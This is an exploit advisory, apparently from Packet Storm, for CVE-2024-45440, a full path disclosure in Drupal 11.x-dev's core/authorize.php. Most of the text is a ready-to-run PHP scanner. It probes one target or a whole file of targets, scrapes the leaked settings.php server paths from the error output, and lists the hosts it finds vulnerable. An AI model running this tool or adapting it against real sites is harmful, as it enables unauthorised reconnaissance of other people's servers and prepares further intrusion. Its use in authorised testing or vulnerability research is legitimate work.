=============================================================================================================================================
| # Title     : Drupal 11.x-dev full Information Disclosure                                                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor    : https://www.drupal.org/project/drupal/releases/11.x-dev                                                                     |
=============================================================================================================================================

[+] References :  https://packetstorm.news/files/id/190573/ &  CVE-2024-45440

[+] Summary : 
             The vulnerability exists due to improper error handling in authorize.php when the hash_salt configuration 
			 attempts to read a non-existent file using file_get_contents(). This reveals the full server path even when error logging is disabled.
			 
[+]  POC : 

php poc.php  or http://127.0.0.1/poc.php 

<?php
/*
 * Drupal 11.x-dev Full Path Disclosure
 * CVE-2024-45440
 * PHP Implementation
 */

class DrupalPathDisclosure {
    private $timeout = 10;
    private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0';
    
    public function scan_single($url) {
        echo "[*] Scanning: $url\n";
        
        if (!str_starts_with($url, 'http')) {
            $url = 'http://' . $url;
        }
        
        $full_url = $url . '/core/authorize.php';
        
        try {
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $full_url,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_TIMEOUT => $this->timeout,
                CURLOPT_USERAGENT => $this->user_agent,
                CURLOPT_FOLLOWLOCATION => false,
                CURLOPT_SSL_VERIFYPEER => false
            ]);
            
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            
            if ($http_code == 200 && strpos($response, 'settings.php') !== false) {
                preg_match_all('/<em class="placeholder">(\/.*?settings\.php)/', $response, $matches);
                
                if (!empty($matches[1])) {
                    echo "[+] Vulnerable - Paths disclosed:\n";
                    foreach ($matches[1] as $path) {
                        echo "    $path\n";
                    }
                    return true;
                }
            }
            
            echo "[-] Not vulnerable\n";
            return false;
            
        } catch (Exception $e) {
            echo "[-] Error: " . $e->getMessage() . "\n";
            return false;
        }
    }
    
    public function scan_multiple($file_path) {
        if (!file_exists($file_path)) {
            echo "[-] File not found: $file_path\n";
            return;
        }
        
        $urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $vulnerable = [];
        
        echo "[*] Scanning " . count($urls) . " targets...\n";
        
        foreach ($urls as $url) {
            if ($this->scan_single($url)) {
                $vulnerable[] = $url;
            }
            echo "\n";
        }
        
        if (!empty($vulnerable)) {
            echo "[+] Summary - Vulnerable hosts:\n";
            foreach ($vulnerable as $host) {
                echo "    $host\n";
            }
        } else {
            echo "[-] No vulnerable hosts found\n";
        }
    }
}

// CLI Interface
if (php_sapi_name() === 'cli') {
    $scanner = new DrupalPathDisclosure();
    
    if ($argc < 2) {
        echo "Usage:\n";
        echo "  php drupal_path.php <url>          - Scan single target\n";
        echo "  php drupal_path.php -f <file>      - Scan multiple targets from file\n";
        echo "\nExamples:\n";
        echo "  php drupal_path.php example.com\n";
        echo "  php drupal_path.php -f targets.txt\n";
        exit(1);
    }
    
    if ($argv[1] === '-f' && isset($argv[2])) {
        $scanner->scan_multiple($argv[2]);
    } else {
        $scanner->scan_single($argv[1]);
    }
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================